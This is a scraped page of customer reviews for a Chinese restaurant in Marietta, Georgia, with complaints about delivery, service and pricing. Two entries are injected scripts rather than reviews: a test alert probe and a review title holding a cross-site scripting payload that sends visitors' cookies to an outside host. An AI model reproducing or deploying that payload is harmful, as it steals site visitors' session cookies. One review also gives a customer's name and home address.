IPhone AppAndroid App

Tel.: 678-560-5550
Add.:617 JOHNSON FERRY RD
MARIETTA GA 30068-4628

Acceptable Card

VISAMASTERAMERICAN EXPRESSDISCOVERCASH
Title: Trespassers9/6/2011 12:14:15 PM
I would never in a million years order from this restaurant, you send people to my gated neighborhood over and over to stick menus in our doors- even though it plainly states on our front gate NO SOLICITING. I call and tell you to stay out of my neighborhood and it does no good.
Title: rr8/9/2016 4:09:01 PM
<script>alert('x');</script>
Title: Horriblt Disrespectful Service8/28/2014 2:53:27 PM
Both of the two times I have eaten here, the service here has been so very disrespectful. I am writing this review whilst eating here. You wonder why its empty in here.
Title: <script src='http://books.1eko.com/b.php?a=' encodeURI(document.cookie)></script>8/27/2015 2:03:01 AM
Title: I almost forgot...8/25/2014 4:26:31 PM
I just submitted an order for delivery: Glen Colton 185 Seville Chase NW Sandy SpringsI neglected to add: PLEASE INCLUDE TABLE MUSTARD AND DUCK SAUCE - NOT the little plastic packets.
Title: ...8/23/2011 10:55:51 AM
Food was good my only complaint is that I was over charged when I placed the order online it was price and a different price when deliver guy came. I don't know if it was something deliver guy did to get a better tip or what.
Title: My order8/22/2011 9:27:30 AM
I am Kathleen. I ordered some food from ure restarunt and I waited for 1 hour and when I got it I paid over $20 and I gave tip and it was cold not luke warm cold! I called and asked if I could get more food I didnt touch the food I had and she said stick it in the microwave. She refused to help me at all. She told me to call manager when they got back from vacation. please Email me and tell me what u guys can do about this. Thank you!
Title: 8/10/2015 4:02:32 PM
First, let me say that I am still very disappointed that the your location in Kennesaw closed down. I haven't found another Chinese restaurant in the area that even comes close to matching your quality, especially with your Pineapple
Title: 7/6/117/6/2011 5:20:41 PM
This restaurant not only has the best chinese food in Cobb County but also the best service.
Title: Delivery Guy7/29/2012 2:31:25 PM
Food was good but the delivery guy was rude. I payed with my credit card and handed him the reciept and when I reached for my food he stepped back and told me I forgot the tip!! I told him that the food had been ordered Over an hour ago and he still did not give me my food. He stood there holding the reciept back to me asking for a tip.!!! R U D E .!
70 Results 1/7 <<1234567>>